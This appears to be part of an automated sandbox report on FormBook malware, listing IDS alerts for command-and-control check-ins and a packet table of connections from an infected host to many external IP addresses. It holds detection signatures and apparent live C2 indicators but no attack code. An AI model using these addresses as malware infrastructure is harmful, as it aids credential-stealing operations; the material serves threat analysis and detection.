                                                                                                                            2024-11-12T15:31:10.014314+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049738203.161.49.19380TCP
                                                                                                                            2024-11-12T15:31:12.685755+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049739203.161.49.19380TCP
                                                                                                                            2024-11-12T15:31:18.152174+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204974013.248.169.4880TCP
                                                                                                                            2024-11-12T15:31:20.831629+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204974113.248.169.4880TCP
                                                                                                                            2024-11-12T15:31:26.173800+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204974313.248.169.4880TCP
                                                                                                                            2024-11-12T15:31:31.658239+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049744173.255.194.13480TCP
                                                                                                                            2024-11-12T15:31:34.323146+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049745173.255.194.13480TCP
                                                                                                                            2024-11-12T15:31:36.991794+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049746173.255.194.13480TCP
                                                                                                                            2024-11-12T15:31:39.660092+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049747173.255.194.13480TCP
                                                                                                                            2024-11-12T15:31:45.115548+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497483.33.130.19080TCP
                                                                                                                            2024-11-12T15:31:47.770947+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497493.33.130.19080TCP
                                                                                                                            2024-11-12T15:31:50.428894+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497503.33.130.19080TCP
                                                                                                                            2024-11-12T15:31:53.081396+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.20497513.33.130.19080TCP
                                                                                                                            2024-11-12T15:32:07.100819+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204975584.32.84.3280TCP
                                                                                                                            2024-11-12T15:32:12.534225+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049756108.179.252.15280TCP
                                                                                                                            2024-11-12T15:32:15.183506+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049757108.179.252.15280TCP
                                                                                                                            2024-11-12T15:32:17.840745+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049758108.179.252.15280TCP
                                                                                                                            2024-11-12T15:32:20.485752+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049759108.179.252.15280TCP
                                                                                                                            2024-11-12T15:32:25.974015+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204976013.248.169.4880TCP
                                                                                                                            2024-11-12T15:32:28.652937+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204976113.248.169.4880TCP
                                                                                                                            2024-11-12T15:32:33.977187+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204976313.248.169.4880TCP
                                                                                                                            2024-11-12T15:32:39.496464+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049764199.59.243.22780TCP
                                                                                                                            2024-11-12T15:32:42.174011+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049765199.59.243.22780TCP
                                                                                                                            2024-11-12T15:32:44.825126+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049766199.59.243.22780TCP
                                                                                                                            2024-11-12T15:32:47.491319+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049767199.59.243.22780TCP
                                                                                                                            2024-11-12T15:32:52.979325+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497683.33.130.19080TCP
                                                                                                                            2024-11-12T15:32:55.650387+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20497693.33.130.19080TCP
                                                                                                                            2024-11-12T15:33:00.987859+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.20497713.33.130.19080TCP
                                                                                                                            2024-11-12T15:33:06.571036+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049772199.59.243.22780TCP
                                                                                                                            2024-11-12T15:33:09.227658+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049773199.59.243.22780TCP
                                                                                                                            2024-11-12T15:33:11.888868+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049774199.59.243.22780TCP
                                                                                                                            2024-11-12T15:33:14.555422+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049775199.59.243.22780TCP
                                                                                                                            2024-11-12T15:33:20.096458+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049776199.59.243.22780TCP
                                                                                                                            2024-11-12T15:33:22.757475+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049777199.59.243.22780TCP
                                                                                                                            2024-11-12T15:33:25.407887+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049778199.59.243.22780TCP
                                                                                                                            2024-11-12T15:33:28.075926+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049779199.59.243.22780TCP
                                                                                                                            2024-11-12T15:33:36.804879+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049780206.119.81.12180TCP
                                                                                                                            2024-11-12T15:33:42.465441+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204978147.52.221.880TCP
                                                                                                                            2024-11-12T15:33:45.324228+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204978247.52.221.880TCP
                                                                                                                            2024-11-12T15:33:48.182107+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204978347.52.221.880TCP
                                                                                                                            2024-11-12T15:33:51.051338+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204978447.52.221.880TCP
                                                                                                                            2024-11-12T15:33:56.720136+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049785154.38.64.680TCP
                                                                                                                            2024-11-12T15:33:59.564053+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049786154.38.64.680TCP
                                                                                                                            2024-11-12T15:34:02.441564+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049787154.38.64.680TCP
                                                                                                                            2024-11-12T15:34:05.288592+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049788154.38.64.680TCP
                                                                                                                            2024-11-12T15:34:19.147113+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204979284.32.84.3280TCP
                                                                                                                            2024-11-12T15:34:32.754058+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049796208.91.197.2780TCP
                                                                                                                            2024-11-12T15:34:38.124306+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049797203.161.49.19380TCP
                                                                                                                            2024-11-12T15:34:40.832489+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049798203.161.49.19380TCP
                                                                                                                            2024-11-12T15:34:43.554422+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049799203.161.49.19380TCP
                                                                                                                            2024-11-12T15:34:46.269429+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049800203.161.49.19380TCP
                                                                                                                            2024-11-12T15:34:51.562136+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204980113.248.169.4880TCP
                                                                                                                            2024-11-12T15:34:54.231250+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.204980213.248.169.4880TCP
                                                                                                                            2024-11-12T15:34:59.588414+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204980413.248.169.4880TCP
                                                                                                                            2024-11-12T15:35:04.884433+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049805173.255.194.13480TCP
                                                                                                                            2024-11-12T15:35:07.558452+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049806173.255.194.13480TCP
                                                                                                                            2024-11-12T15:35:10.227186+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.2049807173.255.194.13480TCP
                                                                                                                            2024-11-12T15:35:12.897242+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049808173.255.194.13480TCP
                                                                                                                            2024-11-12T15:35:18.183174+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498093.33.130.19080TCP
                                                                                                                            2024-11-12T15:35:20.843610+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498103.33.130.19080TCP
                                                                                                                            2024-11-12T15:35:23.491254+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.11.20498113.33.130.19080TCP
                                                                                                                            2024-11-12T15:35:26.164832+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.20498123.33.130.19080TCP
                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Nov 12, 2024 15:29:49.160767078 CET4971980192.168.11.20206.119.81.121
                                                                                                                            Nov 12, 2024 15:29:49.474054098 CET8049719206.119.81.121192.168.11.20
                                                                                                                            Nov 12, 2024 15:29:49.474476099 CET4971980192.168.11.20206.119.81.121
                                                                                                                            Nov 12, 2024 15:29:49.480458975 CET4971980192.168.11.20206.119.81.121
                                                                                                                            Nov 12, 2024 15:29:49.793432951 CET8049719206.119.81.121192.168.11.20
                                                                                                                            Nov 12, 2024 15:29:49.793483973 CET8049719206.119.81.121192.168.11.20
                                                                                                                            Nov 12, 2024 15:29:49.793778896 CET4971980192.168.11.20206.119.81.121
                                                                                                                            Nov 12, 2024 15:29:49.796294928 CET4971980192.168.11.20206.119.81.121
                                                                                                                            Nov 12, 2024 15:29:50.109280109 CET8049719206.119.81.121192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:05.845839977 CET4972080192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:30:06.162204981 CET804972047.52.221.8192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:06.162578106 CET4972080192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:30:06.171499014 CET4972080192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:30:06.487807989 CET804972047.52.221.8192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:06.488620996 CET804972047.52.221.8192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:06.488630056 CET804972047.52.221.8192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:06.488831043 CET4972080192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:30:07.685391903 CET4972080192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:30:08.702852964 CET4972180192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:30:09.023015976 CET804972147.52.221.8192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:09.023209095 CET4972180192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:30:09.030860901 CET4972180192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:30:09.346771002 CET804972147.52.221.8192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:09.348335981 CET804972147.52.221.8192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:09.348380089 CET804972147.52.221.8192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:09.348520994 CET4972180192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:30:10.544096947 CET4972180192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:30:11.561528921 CET4972280192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:30:11.882518053 CET804972247.52.221.8192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:11.882735968 CET4972280192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:30:11.890522957 CET4972280192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:30:11.890587091 CET4972280192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:30:12.208352089 CET804972247.52.221.8192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:12.208399057 CET804972247.52.221.8192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:12.210099936 CET804972247.52.221.8192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:12.210155010 CET804972247.52.221.8192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:12.210300922 CET4972280192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:30:13.402925014 CET4972280192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:30:14.422230959 CET4972380192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:30:14.749339104 CET804972347.52.221.8192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:14.749941111 CET4972380192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:30:14.756283045 CET4972380192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:30:15.087992907 CET804972347.52.221.8192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:15.088499069 CET804972347.52.221.8192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:15.088546038 CET804972347.52.221.8192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:15.088783026 CET4972380192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:30:15.090908051 CET4972380192.168.11.2047.52.221.8
                                                                                                                            Nov 12, 2024 15:30:15.416027069 CET804972347.52.221.8192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:20.830559969 CET4972480192.168.11.20154.38.64.6
                                                                                                                            Nov 12, 2024 15:30:21.145272970 CET8049724154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:21.145642042 CET4972480192.168.11.20154.38.64.6
                                                                                                                            Nov 12, 2024 15:30:21.153552055 CET4972480192.168.11.20154.38.64.6
                                                                                                                            Nov 12, 2024 15:30:21.467226028 CET8049724154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:21.474091053 CET8049724154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:21.474137068 CET8049724154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:21.474308014 CET4972480192.168.11.20154.38.64.6
                                                                                                                            Nov 12, 2024 15:30:22.666515112 CET4972480192.168.11.20154.38.64.6
                                                                                                                            Nov 12, 2024 15:30:23.684139967 CET4972580192.168.11.20154.38.64.6
                                                                                                                            Nov 12, 2024 15:30:24.001275063 CET8049725154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:24.001627922 CET4972580192.168.11.20154.38.64.6
                                                                                                                            Nov 12, 2024 15:30:24.009607077 CET4972580192.168.11.20154.38.64.6
                                                                                                                            Nov 12, 2024 15:30:24.324556112 CET8049725154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:24.331356049 CET8049725154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:24.331403017 CET8049725154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:24.331655979 CET4972580192.168.11.20154.38.64.6
                                                                                                                            Nov 12, 2024 15:30:25.525305033 CET4972580192.168.11.20154.38.64.6
                                                                                                                            Nov 12, 2024 15:30:26.542649984 CET4972680192.168.11.20154.38.64.6
                                                                                                                            Nov 12, 2024 15:30:26.853694916 CET8049726154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:26.853944063 CET4972680192.168.11.20154.38.64.6
                                                                                                                            Nov 12, 2024 15:30:26.861804962 CET4972680192.168.11.20154.38.64.6
                                                                                                                            Nov 12, 2024 15:30:27.172101974 CET8049726154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:27.172116995 CET8049726154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:27.172352076 CET8049726154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:27.172367096 CET8049726154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:27.172378063 CET8049726154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:27.179158926 CET8049726154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:27.179176092 CET8049726154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:27.179439068 CET4972680192.168.11.20154.38.64.6
                                                                                                                            Nov 12, 2024 15:30:28.368371010 CET4972680192.168.11.20154.38.64.6
                                                                                                                            Nov 12, 2024 15:30:29.385793924 CET4972780192.168.11.20154.38.64.6
                                                                                                                            Nov 12, 2024 15:30:29.703547955 CET8049727154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:29.703753948 CET4972780192.168.11.20154.38.64.6
                                                                                                                            Nov 12, 2024 15:30:29.708959103 CET4972780192.168.11.20154.38.64.6
                                                                                                                            Nov 12, 2024 15:30:30.035824060 CET8049727154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:30.042308092 CET8049727154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:30.042378902 CET8049727154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:30.042700052 CET4972780192.168.11.20154.38.64.6
                                                                                                                            Nov 12, 2024 15:30:30.044773102 CET4972780192.168.11.20154.38.64.6
                                                                                                                            Nov 12, 2024 15:30:30.383910894 CET8049727154.38.64.6192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:35.231637001 CET4972880192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:30:35.473270893 CET804972884.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:35.473546028 CET4972880192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:30:35.481281042 CET4972880192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:30:35.722661018 CET804972884.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:35.723148108 CET804972884.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:38.008907080 CET4972980192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:30:38.246484041 CET804972984.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:38.246707916 CET4972980192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:30:38.254262924 CET4972980192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:30:38.493896008 CET804972984.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:38.493938923 CET804972984.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:40.773901939 CET4973080192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:30:41.013039112 CET804973084.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:41.013288021 CET4973080192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:30:41.021265030 CET4973080192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:30:41.021328926 CET4973080192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:30:41.265213966 CET804973084.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:41.265271902 CET804973084.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:43.554548979 CET4973180192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:30:43.796485901 CET804973184.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:43.796771049 CET4973180192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:30:43.801985025 CET4973180192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:30:44.047930956 CET804973184.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:44.047947884 CET804973184.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:44.047967911 CET804973184.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:44.047979116 CET804973184.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:44.047987938 CET804973184.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:44.048012018 CET804973184.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:44.048016071 CET804973184.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:44.048028946 CET804973184.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:44.048063993 CET804973184.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:44.048299074 CET4973180192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:30:44.048317909 CET4973180192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:30:44.051441908 CET4973180192.168.11.2084.32.84.32
                                                                                                                            Nov 12, 2024 15:30:44.294435978 CET804973184.32.84.32192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:49.245290995 CET4973280192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:30:49.383346081 CET8049732208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:49.383496046 CET4973280192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:30:49.398493052 CET4973280192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:30:49.535720110 CET8049732208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:51.927890062 CET4973380192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:30:52.063993931 CET8049733208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:52.064188957 CET4973380192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:30:52.073029995 CET4973380192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:30:52.209322929 CET8049733208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:54.599055052 CET4973480192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:30:54.735548019 CET8049734208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:54.735872030 CET4973480192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:30:54.744513988 CET4973480192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:30:54.881653070 CET8049734208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:57.270281076 CET4973580192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:30:57.407248974 CET8049735208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:57.407464981 CET4973580192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:30:57.412678003 CET4973580192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:30:57.555788994 CET8049735208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:58.706624985 CET8049735208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:58.706641912 CET8049735208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:58.706651926 CET8049735208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:58.706753969 CET8049735208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:58.706774950 CET8049735208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:58.706785917 CET8049735208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:58.706794977 CET8049735208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:58.706804991 CET8049735208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:58.706856012 CET8049735208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:58.706866980 CET8049735208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:58.706876993 CET8049735208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:58.706921101 CET4973580192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:30:58.706921101 CET4973580192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:30:58.707031965 CET4973580192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:30:58.752217054 CET4973580192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:30:58.851485968 CET8049735208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:58.851543903 CET8049735208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:58.851586103 CET8049735208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:58.851628065 CET8049735208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:58.851700068 CET8049735208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:58.851743937 CET8049735208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:58.851784945 CET8049735208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:58.851825953 CET8049735208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:58.851867914 CET8049735208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:58.851910114 CET8049735208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:58.851950884 CET8049735208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:58.852088928 CET8049735208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:58.852150917 CET8049735208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:58.852195024 CET8049735208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:58.852236032 CET8049735208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:58.852278948 CET8049735208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:58.852293968 CET4973580192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:30:58.852320910 CET8049735208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:58.852364063 CET8049735208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:58.852417946 CET4973580192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:30:58.852479935 CET4973580192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:30:58.852479935 CET4973580192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:30:58.852556944 CET4973580192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:30:58.894539118 CET8049735208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:58.894598961 CET8049735208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:58.894954920 CET4973580192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:30:58.994703054 CET8049735208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:58.994764090 CET8049735208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:58.994827986 CET8049735208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:58.994872093 CET8049735208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:58.994914055 CET8049735208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:58.994950056 CET8049735208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:30:58.994978905 CET4973580192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:30:58.995042086 CET4973580192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:30:58.995143890 CET4973580192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:30:59.000008106 CET4973580192.168.11.20208.91.197.27
                                                                                                                            Nov 12, 2024 15:30:59.138418913 CET8049735208.91.197.27192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:04.169915915 CET4973680192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:31:04.348551989 CET8049736203.161.49.193192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:04.348792076 CET4973680192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:31:04.363424063 CET4973680192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:31:04.543298006 CET8049736203.161.49.193192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:04.558024883 CET8049736203.161.49.193192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:04.558033943 CET8049736203.161.49.193192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:04.558226109 CET4973680192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:31:05.875758886 CET4973680192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:31:06.893528938 CET4973780192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:31:07.077912092 CET8049737203.161.49.193192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:07.078177929 CET4973780192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:31:07.085984945 CET4973780192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:31:07.268281937 CET8049737203.161.49.193192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:07.284389973 CET8049737203.161.49.193192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:07.284432888 CET8049737203.161.49.193192.168.11.20
                                                                                                                            Nov 12, 2024 15:31:07.284661055 CET4973780192.168.11.20203.161.49.193
                                                                                                                            Nov 12, 2024 15:31:08.593943119 CET4973780192.168.11.20203.161.49.193
